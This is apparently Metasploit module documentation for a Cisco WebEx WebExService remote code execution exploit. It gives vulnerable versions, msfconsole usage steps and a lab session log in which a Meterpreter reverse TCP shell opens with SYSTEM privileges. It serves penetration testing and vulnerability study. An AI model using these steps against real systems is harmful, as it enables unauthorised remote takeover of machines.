## Description

  This module exploits a remote code execution vulnerability in Cisco's WebEx client software for versions < v33.6.0.655.

  Vulnerable WebEx clients come with the `WebExService` that can execute arbitrary commands with System privileges.
  Due to insufficient checks on permissions, a local or domain user can start the `WebExService` through a remote connection
  and execute code.

## Vulnerable Application

  Cisco WebEx software v33.3.8.7 and below

## Verification Steps

  1. Install the application
  2. Start msfconsole
  3. Do: ```use exploit/windows/smb/webexec```
  4. Do: ```set RHOSTS <IP>```
  5. Do: ```set SMBUser <USERNAME>```
  6. Do: ```set SMBPass <PASSWORD>```
  7. Do: ```run```
  8. You should get a shell.

## Scenarios

### Tested on Cisco WebEx v33.3.8.7 on Windows 7 x64 and x86

  ```

  msf5 > use exploit/windows/smb/webexec 
  msf5 exploit(windows/smb/webexec) > set smbuser a_user
  smbuser => a_user
  msf5 exploit(windows/smb/webexec) > set smbpass password
  smbpass => password
  msf5 exploit(windows/smb/webexec) > set rhosts 192.168.37.136
  rhosts => 192.168.37.136
  msf5 exploit(windows/smb/webexec) > set payload windows/meterpreter/reverse_tcp
  payload => windows/meterpreter/reverse_tcp
  msf5 exploit(windows/smb/webexec) > set lhost 192.168.37.1
  lhost => 192.168.37.1
  msf5 exploit(windows/smb/webexec) > run

  [*] Started reverse TCP handler on 192.168.37.1:4444 
  [*] 192.168.37.136:445 - Connecting to the server...
  [*] 192.168.37.136:445 - Authenticating to 192.168.37.136:445 as user 'a_user'...
  [*] 192.168.37.136:445 - Command Stager progress -   0.96% done (999/104435 bytes)
  [*] 192.168.37.136:445 - Command Stager progress -   1.91% done (1998/104435 bytes)
  ...
  [*] 192.168.37.136:445 - Command Stager progress -  99.47% done (103880/104435 bytes)
  [*] 192.168.37.136:445 - Command Stager progress - 100.00% done (104435/104435 bytes)
  [*] Sending stage (179779 bytes) to 192.168.37.136
  [*] Meterpreter session 1 opened (192.168.37.1:4444 -> 192.168.37.136:49158) at 2018-10-24 09:10:46 -0500

  meterpreter > getuid
  Server username: NT AUTHORITY\SYSTEM
  meterpreter > 

  ```
